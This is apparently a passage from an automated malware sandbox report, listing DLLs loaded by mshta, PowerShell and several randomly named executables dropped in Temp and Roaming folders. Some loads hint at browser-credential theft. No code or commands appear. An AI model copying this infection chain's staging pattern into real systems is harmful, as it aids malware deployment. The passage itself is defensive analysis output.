                                                Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dllJump to behavior
                                                Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: apphelp.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: winmm.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: wininet.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: sspicli.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: kernel.appcore.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: uxtheme.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: mstask.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: windows.storage.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: wldp.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: mpr.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: dui70.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: duser.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: chartv.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: onecoreuapcommonproxystub.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: oleacc.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: atlthunk.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: textinputframework.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: coreuicomponents.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: coremessaging.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: ntmarta.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: wintypes.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: wintypes.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: wintypes.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: wtsapi32.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: winsta.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: textshaping.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: propsys.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: windows.staterepositoryps.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: windows.fileexplorer.common.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: iertutil.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: explorerframe.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: profapi.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: edputil.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: urlmon.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: srvcli.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: netutils.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: appresolver.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: bcp47langs.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: slc.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: userenv.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: sppc.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: onecorecommonproxystub.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: apphelp.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dllJump to behavior
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: winmm.dll
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: wininet.dll
                                                Source: C:\Users\user\AppData\Local\TempP9Z71NKG5FBJTHRSWGFERGT0ANYFFESN.EXESection loaded: kernel.appcore.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winmm.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wininet.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: sspicli.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: iertutil.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: windows.storage.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wldp.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: profapi.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: kernel.appcore.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: ondemandconnroutehelper.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winhttp.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: mswsock.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: iphlpapi.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: winnsi.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: urlmon.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: srvcli.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: netutils.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: uxtheme.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: propsys.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: edputil.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: windows.staterepositoryps.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: wintypes.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: appresolver.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: bcp47langs.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: slc.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: userenv.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: sppc.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: onecorecommonproxystub.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: onecoreuapcommonproxystub.dll
                                                Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exeSection loaded: apphelp.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: apphelp.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: wininet.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: sspicli.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: kernel.appcore.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: uxtheme.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: mstask.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: windows.storage.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: wldp.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: mpr.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: dui70.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: duser.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: chartv.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: onecoreuapcommonproxystub.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: oleacc.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: atlthunk.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: textinputframework.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: coreuicomponents.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: coremessaging.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: ntmarta.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: coremessaging.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: wintypes.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: wintypes.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: wintypes.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: wtsapi32.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: winsta.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: textshaping.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: propsys.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: windows.staterepositoryps.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: windows.fileexplorer.common.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: iertutil.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: profapi.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: edputil.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: urlmon.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: srvcli.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: netutils.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: appresolver.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: bcp47langs.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: slc.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: userenv.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: sppc.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: onecorecommonproxystub.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10107310101\nhDLtPT.exeSection loaded: explorerframe.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: apphelp.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: wininet.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: kernel.appcore.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: wininet.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: sspicli.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: iertutil.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: windows.storage.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: wldp.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: profapi.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: kernel.appcore.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: ondemandconnroutehelper.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: winhttp.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: mswsock.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: iphlpapi.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: winnsi.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: urlmon.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: srvcli.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: netutils.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: dnsapi.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: rasadhlp.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: fwpuclnt.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: uxtheme.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: propsys.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: edputil.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: windows.staterepositoryps.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: wintypes.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: appresolver.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: bcp47langs.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: slc.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: userenv.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: sppc.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: onecorecommonproxystub.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: onecoreuapcommonproxystub.dll
                                                Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exeSection loaded: apphelp.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: apphelp.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: winmm.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: sspicli.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: wininet.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: rstrtmgr.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: ncrypt.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: ntasn1.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: iertutil.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: windows.storage.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: wldp.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: profapi.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: kernel.appcore.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: ondemandconnroutehelper.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: winhttp.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: mswsock.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: iphlpapi.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: winnsi.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: urlmon.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: srvcli.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: netutils.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: dnsapi.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: rasadhlp.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: fwpuclnt.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: dpapi.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: cryptbase.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: ntmarta.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: mozglue.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: wsock32.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: vcruntime140.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: msvcp140.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: vcruntime140.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: uxtheme.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109440101\ILqcVeT.exeSection loaded: windowscodecs.dll
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeSection loaded: apphelp.dll
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeSection loaded: winmm.dll
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeSection loaded: kernel.appcore.dll
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeSection loaded: uxtheme.dll
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeSection loaded: mstask.dll
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeSection loaded: mstask.dll
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeSection loaded: mstask.dll
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeSection loaded: ntmarta.dll
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeSection loaded: mstask.dll
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeSection loaded: sspicli.dll
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeSection loaded: windows.storage.dll
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeSection loaded: wldp.dll
                                                Source: C:\Users\user\AppData\Roaming\10000770100\vertualiziren.exeSection loaded: mpr.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: apphelp.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: winmm.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: sspicli.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: wininet.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: rstrtmgr.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: ncrypt.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: ntasn1.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: iertutil.dll
                                                Source: C:\Users\user\AppData\Local\Temp\10109490101\rXOl0pp.exeSection loaded: windows.storage.dll
